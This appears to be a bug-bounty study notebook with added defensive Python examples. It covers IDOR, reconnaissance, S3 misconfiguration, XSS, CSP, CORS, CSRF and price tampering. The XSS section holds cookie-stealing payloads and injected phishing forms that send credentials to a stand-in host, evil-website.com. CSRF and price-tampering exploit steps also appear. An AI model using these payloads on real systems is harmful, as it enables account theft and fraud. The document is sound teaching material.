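from typing import Callable, Iterable, List


class Forbidden(Exception):
    """Raised when the object does not belong to the caller (or does not exist)."""


@dataclass(frozen=True)
class Invoice:
    id: int
    owner: str
    total: float


# Constructed data store standing in for the database behind an endpoint such
# as /invoice.php?id=1024; ids and owners are made up for the demo.
INVOICES = {
    1024: Invoice(1024, "alice", 49.0),
    1025: Invoice(1025, "bob", 120.0),
}


def get_invoice_vulnerable(session_user: str, invoice_id: int) -> Invoice:
    """Looks the object up by the client-supplied id only: the session is never
    consulted, so any authenticated user can read any invoice (generic IDOR)."""
    return INVOICES[invoice_id]


def get_invoice_safe(session_user: str, invoice_id: int) -> Invoice:
    """Authorization tied to the object: the row must belong to the caller.
    Missing and foreign objects get the same answer, so the id space cannot be
    enumerated through different error messages."""
    inv = INVOICES.get(invoice_id)
    if inv is None or inv.owner != session_user:
        raise Forbidden("not found")
    return inv


def probe_idor(handler: Callable[[str, int], Invoice],
               attacker: str, ids: Iterable[int]) -> List[int]:
    """The two-account test from the hunter's side: request each id as the
    attacker's session and report ids whose object belongs to someone else."""
    leaked = []
    for invoice_id in ids:
        try:
            inv = handler(attacker, invoice_id)
        except (Forbidden, KeyError):
            continue
        if inv.owner != attacker:
            leaked.append(invoice_id)
    return leaked
```

Against the vulnerable handler, logging in as bob and requesting alice's id 1024 leaks her invoice; against the fixed handler the same probe returns nothing. For blind IDORs (password change, delete) the fix is the same ownership check before the write, and the probe has to observe the effect through the victim account instead of the response. The same check expressed as a database filter (WHERE id=? AND owner=?) is what the parameterized-query advice in the SQL injection section looks like once authorization is added.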

Where IDORs are commonly found (share of analysed public reports):

REST APIs 31.8%
GET parameters 25.8%
POST request bodies 21.2%
GraphQL endpoints 9.1%
PUT parameters 4.5%
IDs in the request header 3.0%
IDs in the cookies 3.0%
Misc. query languages 1.5%


OWASP Broken Web Applications lab setup:

https://sourceforge.net/projects/owaspbwa/

Unzip

Open in the virtual machine { import }

Change the network adapter to NAT

Username: root, password: owaspbwa

Check the IP, type it into the browser, and you get the lab.

#Google dorks for VDP finds


inurl /bug bounty

inurl: / security

inurl:security.txt

inurl:security "reward"

inurl: /responsible disclosure

inurl: /responsible-disclosure/ reward

inurl: / responsible-disclosure/ swag

inurl: / responsible-disclosure/ bounty

inurl:'/responsible disclosure' hoodie

responsible disclosure swag r=h:com

responsible disclosure hall of fame

inurl: responsible disclosure $50

#Horizontal correlation: facebook.in, facebook.cn, facebook.pk, facebook.us

#Vertical correlation: blog.facebook.com, help.facebook.com etc.


#Get ASN numbers and IP ranges

https://whois.arin.net/ui/

https://bgp.he.net/

Just provide top company name

#Based on the ASN number get more IP ranges

https://mxtoolbox.com/SuperTool.aspx#

Just provide asn number

#ASN details fetching

https://viewdns.info/asnlookup/

Just provide asn number

#Find domain names owned by top company names or email IDs.

https://viewdns.info/reversewhois/

https://www.whoxy.com/

#ASN to domain names

amass intel -asn <asn number>

#Domain name to host IP

https://search.censys.io/

#CIDR to IP range conversion

https://ipinfo.io/tools/cidr-to-ip-range-converter

shodan :
Shodan is a search engine designed to find devices connected to the internet, ranging from webcams
and routers to complex industrial control systems.

https://www.shodan.io/

Webcam

port:21

asn:as32934

vuln:CVE-2023-36603

os:windows

os:linux

apache version 2.2

#Subdomain enumeration

https://crt.sh/

https://www.virustotal.com/gui/home/search { Relation > sub domain }

https://searchdns.netcraft.com/ { site contains }

https://chaos.projectdiscovery.io/

https://subdomainfinder.c99.nl/

site:dishtv.in

#sublist3r

sudo apt install sublist3r

sublist3r -d domain

#amass

amass enum -d domainname

https://github.com/owasp-amass/amass/blob/master/examples/config.yaml

mv config.yaml .config/amass

https://github.com/owasp-amass/amass/blob/master/examples/datasources.yaml

mv datasources.yaml .config/amass

cd .config/amass

nano datasources.yaml { adding API keys like Shodan, VirusTotal }

#subfinder

sudo apt install subfinder

sudo apt update && sudo apt upgrade

cd .config > cd subfinder > nano provider-config.yaml = add the API key for each service provider.

subfinder -d domainname -o filename

#httpx-toolkit

It sends HTTP requests and displays which subdomains are responding and which are not.

sudo su

apt install httpx-toolkit

httpx-toolkit -list file -silent -probe > output.txt

For file, provide the file containing the subdomain list.

#ffuf -c -u https://FUZZ.dishtv.in -w wordlist -mc 200 -rate 100


#word lists:

https://github.com/theMiddleBlue/DNSenum/tree/master/wordlist

https://github.com/n0kovo/n0kovo_subdomains

https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS

Subdomain takeover

Subdomain takeover happens when a subdomain points to an external service (like GitHub Pages,
AWS S3, Heroku, etc.), but the service is not properly configured. The DNS record remains in place,
but the resource it points to is no longer active or owned, leaving the subdomain vulnerable to
exploitation.

How Does This Happen?

Creating a Subdomain: Imagine you set up a subdomain like shop.example.com to connect to an
online store hosted by a cloud service called Azure.

Service Disconnected: Later, you decide to close your online store and delete it from Azure. However,
the connection from shop.example.com to Azure is still active, even though the store is gone.

Attacker Steps In: A cybercriminal notices that shop.example.com is still connected to Azure but isn't
being used. They create a new store on Azure and link it to shop.example.com.

Takeover Complete: Now, whenever someone visits shop.example.com, they are taken to the
attacker's store instead of yours. The attacker has taken over your subdomain.

https://httpstatus.io/

dig subdomain -t CNAME, nslookup subdomain

#Automatic tools:

go install -v github.com/LukaSikic/subzy@latest

sudo cp ~/go/bin/subzy /bin/

subzy run --target http://testphp.vulnweb.com


subzy run --target http://testphp.vulnweb.com,test.google.com,https://test.yahoo.com

subzy run --targets list.txt

sudo apt install subjack

subjack -w targets.txt --timeout 30 -t 100 -v

https://github.com/EdOverflow/can-i-take-over-xyz


Sensitive data exposure

Sensitive data exposure in JavaScript files happens when confidential information (like passwords,
API keys, or personal data) is improperly handled, stored, or exposed in client-side code. This can
lead to security risks such as data breaches.

Usernames & Passwords


API Keys & Access Tokens

Session IDs

Multi-Factor Authentication (MFA) Secrets etc…

To inspect a website's code, open the page in the Brave browser, right-click (two-finger click on a
trackpad) to open the context menu, select 'View page source', then use the browser's search function
to find links ending with '.js' and investigate those files for potential sensitive information.

https://simplescraper.io/extracturls?utm_source=chatgpt.com

https://www.xml-sitemaps.com/

https://yourgpt.ai/tools/url-extractor?utm_source=chatgpt.com

#getjs

go install github.com/003random/getJS/v2@latest

sudo cp ~/go/bin/getJS /bin/

getJS --url https://www.dishtv.in/

getJS -input urls.txt | grep -i https

#subjs :

wget https://github.com/lc/subjs/releases/download/v1.0.1/subjs_1.0.1_linux_amd64.tar.gz

tar -xf subjs_1.0.1_linux_amd64.tar.gz

sudo mv subjs /usr/bin/

cat urls.txt | subjs

or

subjs -i urls.txt

NOTE: you can also provide the subdomain list in a file.

#katana
su

go install github.com/projectdiscovery/katana/cmd/katana@latest

sudo cp ~/go/bin/katana /bin/

sudo katana -u target.in -jc | grep js$

sudo katana -list urls.txt -jc | grep js$

#SecretFinder

git clone https://github.com/m4ll0k/SecretFinder.git secretfinder

cd secretfinder

sudo apt install python3-requests-file python3-requests python3-jsbeautifier python3-lxml

chmod +x SecretFinder.py

python3 SecretFinder.py -i javaurl

#mantra

go install github.com/Brosck/mantra@latest

sudo cp ~/go/bin/mantra /bin/

cat javaurl | mantra

Sensitive data exposure in GitHub

Sensitive data exposure in GitHub through GitHub dorks is a common security risk. Attackers use
GitHub dorking to search for exposed credentials, API keys, database URLs, and other sensitive
information accidentally pushed to public repositories.

https://gist.github.com/jhaddix/77253cea49bf4bd4bfd5d384a37ce7a4

https://github.com/random-robbie/keywords/blob/master/keywords.txt

https://github.com/0xPugazh/Awesome-Dorks/blob/master/github-dorks.txt

https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt

git clone https://github.com/obheda12/GitDorker.git

cd GitDorker

python3 -m venv sai

source sai/bin/activate

pip3 install -r requirements.txt

deactivate

settings > developer settings > personal access tokens > tokens(classic) > generate new token >
generate new token classic > provide any name and select all options at scope >generate token

cd tf

nano TOKENSFILE { add all list of tokens }

python3 GitDorker.py -d Dorks/medium_dorks.txt -tf tf/TOKENSFILE -q anits.edu.in -lb

python3 GitDorker.py -d Dorks/alldorksv3 -tf tf/TOKENSFILE -q anits.edu.in -lb

Finding Misconfigured AWS S3 Buckets

AWS S3 (Simple Storage Service) is commonly misconfigured, leading to severe security risks such as
data exposure, takeover, and unauthorized modifications.

Buckets with “Public Read” or “Public Write” permissions allow anyone to view or modify data.

https://buckets.grayhatwarfare.com/

https://buckets.grayhatwarfare.com/top_keywords { top keywords }

AWS Access Key ID and AWS Secret Key = GitHub dorks

site:http://s3.amazonaws.com intitle:index.of.bucket

site:http://amazonaws.com inurl:".s3.amazonaws.com/"

site:.s3.amazonaws.com "Company"

intitle:index.of.bucket

site:http://s3.amazonaws.com intitle:Bucket loading

site:*.amazonaws.com inurl:index.html

https://bkname.s3.amazonaws.com/

https://bkname.s3.amazonaws.com/filename

sudo apt install awscli

aws s3 ls s3://bucketname --no-sign-request

Listing files in public s3 bucket.

aws s3 cp s3://bkname/filename /home/saijain --no-sign-request

wget https://bkname.s3.amazonaws.com/filename

Download File from a public s3 bucket.

aws configure

Set up credentials to aws cli

provide the AWS access key ID and AWS secret key

aws configure list

To check that the credentials are saved; it shows the stored credentials.

aws s3 ls s3://bucketname

aws s3 cp s3://bkname/filename /home/saijain


aws s3 cp localfilename s3://bucketname

Upload a local file into the s3 bucket.

git clone https://github.com/nahamsec/lazys3.git

cd lazys3

sudo apt install ruby

ruby lazys3.rb "dishtv" , ruby lazys3.rb "anits"

go install -v github.com/sa7mon/s3scanner@latest

s3scanner -bucket bkname -enumerate { enumerates permissions and the number of objects }

https://github.com/koaj/aws-s3-bucket-wordlist

s3scanner -bucket-file list.txt -enumerate { checks which bucket names from the wordlist are valid, and their permissions and objects }

All tools list: https://github.com/mxm0z/awesome-sec-s3?tab=readme-ov-file

XSS (Cross-Site Scripting)

Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject malicious
scripts into web pages viewed by other users. This can lead to data theft, session hijacking,
defacement, and more.

Types of XSS Attacks

1. Stored XSS (Persistent XSS)

The malicious script is permanently stored on the target server (e.g., in a database, forum post, or
comment section).
Whenever a user loads the affected page, the script executes in their browser.

Example: A hacker injects a <script> tag into a comment box, which steals cookies from all visitors.

Popular vulnerability

It shows a popup

2. Reflected XSS (Non-Persistent XSS)

The malicious script is included in a URL and executed when the victim clicks the link.

It is not stored on the server but reflected back to the user through HTTP responses.

Example: A phishing email contains a link like:

http://victim.com/search?q=<script>alert('XSS')</script>

If the website does not sanitize input, the script executes.

Popular vulnerability

It shows a popup

3. DOM-Based XSS

The attack occurs when JavaScript modifies the DOM (Document Object Model) dynamically without
proper validation.

The script is executed client-side, without reaching the server.

Example:

var userInput = location.hash;
document.write(userInput); // Dangerous if not sanitized

If the user visits http://example.com#<script>alert('XSS')</script>, the script executes in their
browser.

Least popular vulnerability

4. Blind XSS (a type of persistent XSS)

Similar to Stored XSS, but the attacker does not immediately see the execution.

The payload is stored and executed later in an admin panel or internal dashboard where an admin
unknowingly triggers it.

Medium popularity vulnerability.

No popup in real time

You insert your payload in all input fields, like the comment section, signup forms, contact forms,
feedback forms etc.

Burp: add to scope, spider the host, select the parameter, send to Repeater, insert blind XSS payloads
in the Host, Origin, Referer and User-Agent headers and in the parameters.

Any parameter: id=blind xss payload

bxsshunter.io { you get an XSS fire notification if the XSS exists } { use the website's payload }

Burp Collaborator

Go to the Burp Suite app, Burp > Burp Collaborator client > Copy to clipboard

“><script src=burpcode.burpcollaborator.net></script>

<img/src=https://burpcode.burpcollaborator.net>

Insert the payload in all input fields

Poll now

You will get an HTTP request, and the IP is also available in that packet.

Payload:

<script>alert(1)</script>

<script>alert('XSS')</script>

<script>alert(document.cookie)</script>

</scrip</script>t><img src=q onerror=prompt(document.cookie)>

"></script>"><--<img+src= "><svg/onload=alert(document.cookie)>> --!>

<script>
var html = '<form action="http://evil-website.com/steal-credentials.php" method="post">' +
'Username: <input type="text" name="username"><br>' +
'Password: <input type="password" name="password"><br>' +
'<input type="submit" value="Login">' +
'</form>';
document.write(html);
</script>

<script>alert("You have won a prize! Please enter your credit card information below.");</script>

<script>
var html = '<div style="background-color: yellow; padding: 10px;">' +
'Update Available' +
'</div>';
document.write(html);
</script>

<script>
var html = '<div style="background-color: lightblue; padding: 10px;">' +
'<form action="http://evil-website.com/steal-info.php" method="post">' +
'<input type="text" name="message" placeholder="Enter a message"><br>' +
'<input type="submit" value="Send">' +
'</form>' +
'</div>';
document.write(html);
</script>

<script>
var html = '<div style="background-color: lightblue; padding: 10px;">' +
'Social Engineering Attack: Click the link below to claim your prize:' +
'<a href="http://evil-website.com/malware.exe">Claim Prize</a>' +
'</div>';
document.write(html);
</script>

<script>
var html = '<div style="background-color: lightgreen; padding: 10px;">' +
'Phishing Attack: Please enter your bank account information below:' +
'<form action="http://evil-website.com/steal-info.php" method="post">' +
'Account Number: <input type="text" name="account"><br>' +
'Routing Number: <input type="text" name="routing"><br>' +
'Password: <input type="password" name="password"><br>' +
'<input type="submit" value="Submit">' +
'</form>' +
'</div>';
document.write(html);
</script>

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

https://github.com/payloadbox/xss-payload-list

Where to find XSS?

Any input form or search field

Review and comment sections, account creation name field, username field and password field,
email field, phone number field, adding and editing an address, email subscribe, order tracking
through ID { stored }

Parameters, ex: id=xss script { reflected }

NOTE:

We can try to escalate XSS to account takeover or even SSRF or other high severity vulnerabilities.

Try logging in with a fake username and password and intercept through Burp Suite > Do intercept >
Response to this request > 302 you must login > add Set-Cookie: cookie > Forward

Cloudflare bypass payloads:

XSS finding through a .svg file at the profile picture update functionality.

<?xml version="1.0" standalone="no"?>

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"


"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">

<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

<script type="text/javascript">

alert("sai jain");

</script>

</svg>

Common XSS Attacks:

Stealing cookies or session tokens to hijack user sessions.

Redirecting users to malicious websites.

Defacing websites by altering webpage content.

Keylogging to capture user inputs.

Approaches of shielding your site against Cross-Site Scripting (XSS)

Here are some common approaches for shielding your site against Cross-Site Scripting (XSS) attacks:

Input Validation: Validate all user inputs before using them in your application. This can help to
prevent attackers from injecting malicious code into your site.

Escaping: Convert any special characters in user inputs into their HTML entity equivalents before
using them in your application. This will prevent the special characters from being executed as code
in the user's browser.

Use of Prepared Statements: Use prepared statements or parameterized queries when interacting
with a database to prevent attackers from injecting malicious code into your SQL statements.

Content Security Policy (CSP): Implement a Content Security Policy (CSP) that specifies which
content sources can be executed within your web application. This can help to prevent XSS attacks by
blocking malicious scripts from being executed.

Web Application Firewall (WAF): Use a Web Application Firewall (WAF) to monitor and filter HTTP
traffic to your web application and block requests containing malicious code.

Regular Security Updates and Patches: Regularly update your software and apply security patches to
address any known vulnerabilities in your web application.

Security Testing: Regularly test your web application for security vulnerabilities, including XSS
attacks, using automated tools or manual penetration testing.
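
The escaping approach above, as an added example that is not part of these notes: the reflected search?q= sink rendered unsafely and with output encoding, checked against payloads from the list earlier in the section. The page fragments and renderer names are constructed.

```python
# Added example (not from the notes): output encoding for the reflected
# search?q=... case. Page fragments and payloads are constructed.
import html
from urllib.parse import quote


def render_search_unsafe(q):
    """Reflects q verbatim into the HTML body: the classic reflected XSS sink."""
    return f"<p>Results for: {q}</p>"


def render_search_safe(q):
    """HTML body context: encode <, >, &, \" and ' before interpolating."""
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def render_search_link(q):
    """URL-in-attribute context needs two layers: percent-encode the value for
    the query string, then HTML-escape the whole attribute value."""
    encoded = html.escape(quote(q, safe=""), quote=True)
    return f'<a href="/search?q={encoded}">search again</a>'


def payload_survives(rendered, payload):
    """True if the raw payload (with its < > and quotes) reached the page intact."""
    return payload in rendered


# Constructed inputs, taken from the payload list in these notes
PAYLOADS = [
    "<script>alert('XSS')</script>",
    '"><svg/onload=alert(document.cookie)>',
    "</scrip</script>t><img src=q onerror=prompt(document.cookie)>",
]


def evaluate():
    """Counts how many payloads come through each renderer unencoded, and
    confirms escaping is lossless (the data is preserved, only its meaning changes)."""
    return {
        "unsafe": sum(payload_survives(render_search_unsafe(p), p) for p in PAYLOADS),
        "safe": sum(payload_survives(render_search_safe(p), p) for p in PAYLOADS),
        "round_trip_ok": all(html.unescape(html.escape(p, quote=True)) == p for p in PAYLOADS),
    }


if __name__ == "__main__":
    print(evaluate())
```

html.escape covers HTML body and quoted-attribute contexts only; a value placed inside a JavaScript string or a CSS block needs that context's own encoding, which is why escaping is paired with a CSP rather than relied on alone.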

CSP (Content Security Policy)

Content Security Policy (CSP) is a security feature that helps prevent web attacks like Cross-Site
Scripting (XSS) and data injection by controlling which resources (scripts, styles, images, etc.) a web
page can load. It acts as a browser-enforced whitelist for trusted content sources.

What Does CSP Block?

CSP can block various types of potentially dangerous content, including:

1. Inline JavaScript & CSS – Blocks <script> tags and style attributes unless explicitly allowed. Prevents
inline event handlers like onclick="alert(1)".

2. External Scripts – Restricts script loading from untrusted domains (e.g., preventing a malicious
script from attacker.com).

3. Dynamic Code Execution – Blocks eval(), setTimeout("alert(1)"), and new Function() by default.

4. Mixed Content – Blocks HTTP content on an HTTPS site (e.g., prevents loading an insecure image
or script).

5. Framing & Embedding – Prevents the page from being loaded inside iframes (Clickjacking
protection).

Does CSP Apply to All Websites or Specific Pages?

CSP is defined using the Content-Security-Policy HTTP header or <meta> tag.

It applies only to pages where it is set.

Each page can have its own CSP rules.

Example of setting CSP in an HTML page:

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'
https://trusted.com;">

This allows scripts only from the same site ('self') and trusted.com.

What Happens in the Browser When CSP is Applied?

1. The browser reads the CSP rules from the HTTP header or <meta> tag.

2. It blocks any scripts, styles, or other resources not allowed by the CSP.

3. If a blocked script tries to execute, the browser shows a CSP violation error in the console.
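
An added example, not from these notes, that turns the "What does CSP block?" list above into a check: it parses a Content-Security-Policy value and reports the settings that re-open each hole (inline scripts, eval, any-host script sources, mixed content, framing). The policy strings are constructed sample input.

```python
# Added example (not from the notes): a small auditor for Content-Security-Policy
# values like the <meta> example above. Policies are constructed sample input.

WEAK_HOST_SOURCES = {"*", "http:", "https:"}
STRICT_PREFIXES = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(policy):
    """'default-src 'self'; script-src 'self' https://x' -> {directive: [sources]}"""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def effective_sources(directives, name):
    """Fetch directives (script-src, img-src, ...) fall back to default-src."""
    return directives.get(name, directives.get("default-src", []))


def audit_csp(policy):
    """Return findings that undo what CSP is meant to block; [] means clean."""
    d = parse_csp(policy)
    findings = []
    if "default-src" not in d:
        findings.append("no default-src: resource types without their own directive are unrestricted")
    scripts = effective_sources(d, "script-src")
    if not scripts:
        findings.append("no script-src or default-src: script loading is unrestricted")
    # a nonce or hash makes browsers ignore 'unsafe-inline', so only flag it alone
    if "'unsafe-inline'" in scripts and not any(s.startswith(STRICT_PREFIXES) for s in scripts):
        findings.append("'unsafe-inline' in script-src: inline <script> and onclick= handlers run")
    if "'unsafe-eval'" in scripts:
        findings.append("'unsafe-eval' in script-src: eval() and new Function() run")
    if WEAK_HOST_SOURCES & set(scripts):
        findings.append("script-src allows any host: a script from attacker.com would load")
    if any(s.startswith("http://") for s in scripts):
        findings.append("http: script source: mixed content on an HTTPS page")
    if "frame-ancestors" not in d:
        findings.append("no frame-ancestors: the page can be framed (clickjacking)")
    return findings


if __name__ == "__main__":
    for finding in audit_csp("default-src *; script-src * 'unsafe-inline' 'unsafe-eval'"):
        print("-", finding)
```

One caveat for the <meta> form above: browsers ignore frame-ancestors in a <meta> policy, so the clickjacking protection only works when the policy is sent in the HTTP header.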

Same-Origin Policy (SOP)

SOP is a security rule in web browsers that blocks a website from accessing data from another
website unless both have the same origin (same domain, protocol, and port).

Example (Blocked by SOP)

Imagine you open Site A (https://example.com) in your browser. If Site A tries to request data from
Site B (https://another-site.com), the browser blocks it for security reasons.

Why is SOP important?

Prevents hackers from stealing your data from other websites.

Stops malicious websites from making unauthorized requests.

Cross-Origin Resource Sharing (CORS) – Basic Explanation

CORS is a way for websites to allow controlled access to their resources from different origins. A
server can use CORS headers to say:

✔ "Yes, this other website is allowed to request my data."

Example (Allowed by CORS)

Site A (https://frontend.com) wants to access an API at Site B (https://api.server.com).

Normally, SOP blocks this request.

But if Site B’s server adds a special CORS header in the HTTP response:

Access-Control-Allow-Origin: https://frontend.com

then the browser allows the request!

Why is CORS used?

Allows secure data sharing between trusted websites.

Helps web applications access external APIs.
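
The SOP and CORS exchange above, as an added example that is not from these notes: the server side of the frontend.com to api.server.com request, with the weak "reflect any Origin" response beside the allowlisted one, and the browser's read check that decides whether the page can see the data. The allowlist, handler names and header dicts are constructed.

```python
# Added example (not from the notes): the server side of the CORS exchange
# between frontend.com and api.server.com, plus the browser's read check.
# Allowlist, handlers and header dicts are constructed.
from urllib.parse import urlsplit

ALLOWED_ORIGINS = {"https://frontend.com"}   # constructed allowlist


def cors_headers_reflecting(request_headers):
    """Weak: echoes any Origin and allows credentials, so every site on the web
    can read api.server.com responses made with the victim's cookies."""
    origin = request_headers.get("Origin")
    if origin is None:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def cors_headers_allowlisted(request_headers):
    """Fixed: exact match on scheme and host against a fixed allowlist, 'null'
    refused, and Vary: Origin so shared caches do not serve one origin's answer
    to another."""
    origin = request_headers.get("Origin")
    if origin is None or origin == "null":
        return {}
    parts = urlsplit(origin)
    normalized = f"{parts.scheme.lower()}://{parts.netloc.lower()}"
    if normalized not in ALLOWED_ORIGINS:      # no prefix/suffix matching
        return {}
    return {"Access-Control-Allow-Origin": normalized,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}


def browser_permits_read(page_origin, response_headers, with_credentials=True):
    """What the browser does with the response: compares
    Access-Control-Allow-Origin with the page's origin (SOP otherwise wins)."""
    acao = response_headers.get("Access-Control-Allow-Origin")
    if acao is None:
        return False
    if acao == "*":
        return not with_credentials      # wildcard never pairs with credentials
    if acao != page_origin:
        return False
    return (not with_credentials
            or response_headers.get("Access-Control-Allow-Credentials") == "true")


if __name__ == "__main__":
    evil = {"Origin": "https://attacker.example"}
    print("reflecting:", browser_permits_read("https://attacker.example", cors_headers_reflecting(evil)))
    print("allowlisted:", browser_permits_read("https://attacker.example", cors_headers_allowlisted(evil)))
```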

HTTP Header

An HTTP header is a key-value pair that is sent with HTTP requests and responses between a client
(browser, API client) and a server. These headers provide important metadata about the request or
response, such as content type, authentication, caching policies, and more.

What Type of Data is in an HTTP Header?

HTTP headers contain key-value pairs that provide metadata about an HTTP request or response.
These headers carry different types of data, including:

1. Client Information

Identifies the client making the request.

Example:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Explanation: Indicates the browser, operating system, and device information.

2. Server Information

Provides details about the server responding to a request.

Example:

Server: Apache/2.4.41 (Ubuntu)

Explanation: Specifies the web server software and version.

3. Authentication Data

Used for user authentication and authorization.

Example:

Authorization: Bearer <access_token>

Explanation: Sends an authentication token to access protected resources.

4. Content Information

Defines the type, encoding, or language of the content.

Example:

Content-Type: application/json

Explanation: Specifies that the response contains JSON data.

5. Caching Directives

Controls how data is cached by the browser or proxy.

Example:

Cache-Control: max-age=3600

Explanation: Tells the browser to cache the response for 3600 seconds.

6. Security Policies

Helps prevent security vulnerabilities.

Example:

Strict-Transport-Security: max-age=31536000; includeSubDomains

Explanation: Forces HTTPS connections to protect against downgrade attacks.

7. Cookies & Session Data

Manages user sessions.

Example:

Set-Cookie: session_id=abc123; HttpOnly; Secure


Explanation: Stores a session ID that the client uses in subsequent requests.

Types of HTTP Headers

1. Request Headers

Sent by the client (browser, API client) to the server to provide information about the request.

Examples:

Host: Specifies the domain name of the server.

User-Agent: Provides details about the client's browser and operating system.

Accept: Defines the media types the client can handle (e.g., text/html, application/json).

Authorization: Sends authentication credentials (e.g., Bearer <token> for OAuth).

Referer: Indicates the URL the request originated from.

2. Response Headers

Sent by the server to provide information about the response.

Examples:

Server: Identifies the server software (e.g., Apache/2.4.41).

Content-Type: Specifies the MIME type of the response (text/html, application/json).


Set-Cookie: Sends a cookie to the client for session management.

Cache-Control: Defines caching policies (e.g., no-cache, max-age=3600).

WWW-Authenticate: Requests authentication from the client.

CSRF

CSRF (Cross-Site Request Forgery) is a web security vulnerability that tricks a user into executing
unwanted actions on a web application where they are authenticated. Attackers exploit CSRF by
sending malicious requests on behalf of the user without their consent.

Changing Username, Password, or Email ID, Transferring Funds, Modifying Payment Methods etc..

Client-side attack.

Method:

Intercept the password change request of the attacker's own account using Burp Suite.

Right click > Engagement tools > Generate CSRF PoC > Options > tick "Include auto-submit script" >
Generate > Copy HTML

On the attacker's computer, create a file named csrf.html using Notepad and paste the HTML code
copied from Burp Suite.

Share the file with the victim; when the victim opens the file in a browser, boom.

Right click > change request method.
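
An added example, not from these notes, of the server-side check that makes the generated csrf.html fail: a synchronizer token bound to the session and to the action, plus an Origin check as a second layer. The attacker's page can submit the form from the victim's browser (cookies ride along) but cannot read or forge the token. The session store, handler and names are constructed.

```python
# Added example (not from the notes): synchronizer-token CSRF protection for a
# password-change endpoint. Session store and handlers are constructed.
import hashlib
import hmac
import secrets

SESSIONS = {}   # constructed: session_id -> {"user": ..., "csrf_secret": ...}


def new_session(user):
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf_secret": secrets.token_bytes(32)}
    return sid


def csrf_token(sid, action):
    """Token bound to the session secret and to the action it protects, so a
    token leaked from one form cannot be replayed against another."""
    return hmac.new(SESSIONS[sid]["csrf_secret"], action.encode(), hashlib.sha256).hexdigest()


def change_password(cookie_sid, form, origin=None, allowed_origin="https://example.com"):
    """Returns (status, detail). Cookies alone never authorize a state change."""
    sess = SESSIONS.get(cookie_sid)
    if sess is None:
        return 401, "no session"
    # browsers attach Origin to cross-site POSTs; a foreign origin is rejected outright
    if origin is not None and origin != allowed_origin:
        return 403, "cross-site origin"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(cookie_sid, "change_password")):
        return 403, "bad csrf token"
    sess["password"] = form["new_password"]
    return 200, "password changed"


def demo():
    """Legitimate form submission versus the auto-submitting csrf.html."""
    sid = new_session("victim")
    # the real page rendered a token for the logged-in user
    legit = {"csrf_token": csrf_token(sid, "change_password"), "new_password": "n3w"}
    # csrf.html: the victim's cookies are sent, the token is absent
    forged = {"new_password": "attacker"}
    return {
        "legit": change_password(sid, legit, origin="https://example.com")[0],
        "forged": change_password(sid, forged, origin="https://attacker.example")[0],
        "forged_no_origin": change_password(sid, forged)[0],
        "final_password": SESSIONS[sid]["password"],
    }


if __name__ == "__main__":
    print(demo())
```

Setting the session cookie with SameSite=Lax or Strict adds a third, browser-enforced layer, but the token check is what holds when that attribute is missing or the browser is old.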
Price Tampering

Price Tampering Vulnerability is a security flaw in web applications where an attacker manipulates
the price or quantity of a product or service before making a purchase. This is typically done by
modifying client-side parameters (such as form fields, cookies, or API requests) using tools like Burp
Suite to gain unauthorized discounts or free products, and it works because of improper server-side
validation.

Steps to Exploit Using Burp Suite:

1. Intercept the Purchase Request:

Open Burp Suite and turn Intercept ON under the Proxy tab.

Add a product to the cart and proceed to checkout.

Capture the HTTP request sent from the browser.

2. Modify the Price Parameter:

The intercepted request may look like this:

POST /checkout HTTP/1.1
Host: example.com
Content-Type: application/json

{
"product_id": "123",
"price": "100",
"quantity": "1"
}

Modify the "price" value to "1":

{
"product_id": "123",
"price": "1",
"quantity": "1"
}

3. Forward the Modified Request:

Click "Forward" to send the modified request to the server.

If the server does not validate the price against its database, the purchase will be processed at the
altered price.

4. Check the Response:

If the server accepts the modified price and proceeds to payment or confirms the order at ₹1 instead
of ₹100, the vulnerability is successfully exploited.

Bypass :change request method,-500,0,150-150,1.50,1

How to Prevent Price Tampering:

1. Server-Side Validation: Ensure the price is fetched from the server database, not from the client
request.

2. Use Fixed Pricing on the Backend: The server should ignore price values sent from the client.

3. Implement Digital Signatures: Sign price values with an HMAC or a digital signature so that any
tampering is detected.

4. Monitor Suspicious Transactions: Flag and review unusually low-price purchases.

5. Use Web Application Firewalls (WAF): Detect and block parameter manipulation.
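
An added example, not from these notes, of prevention steps 1 to 3 applied to the /checkout request above: the server prices the order from its own catalogue, verifies an HMAC over the price it quoted, and rejects the negative and zero quantities listed under "Bypass". The catalogue, key and handler names are constructed.

```python
# Added example (not from the notes): server-side handling of the /checkout
# body above. The server recomputes the total from its own catalogue and
# verifies an HMAC over the price it quoted, so a client-edited "price" is
# rejected. Catalogue, key and handlers are constructed.
import hashlib
import hmac
import json
from decimal import Decimal

CATALOGUE = {"123": Decimal("100")}             # constructed price list
PRICE_KEY = b"constructed-secret-kept-on-the-server"


def price_tag(product_id, price):
    """HMAC over product and price; the client cannot recompute it for a new price."""
    msg = f"{product_id}:{price}".encode()
    return hmac.new(PRICE_KEY, msg, hashlib.sha256).hexdigest()


def quote_line(product_id):
    """What the server sends to the cart page: the price and its tag."""
    price = str(CATALOGUE[product_id])
    return {"product_id": product_id, "price": price, "sig": price_tag(product_id, price)}


def make_body(**fields):
    """Builds the JSON checkout body the browser would send."""
    return json.dumps(fields)


def checkout(body):
    """Returns (status, total_as_str, reason); never trusts the client's figures."""
    try:
        req = json.loads(body)
        if not isinstance(req, dict):
            raise ValueError("body must be an object")
        product_id = str(req["product_id"])
        quantity = int(req["quantity"])
        claimed = Decimal(str(req["price"]))     # InvalidOperation is an ArithmeticError
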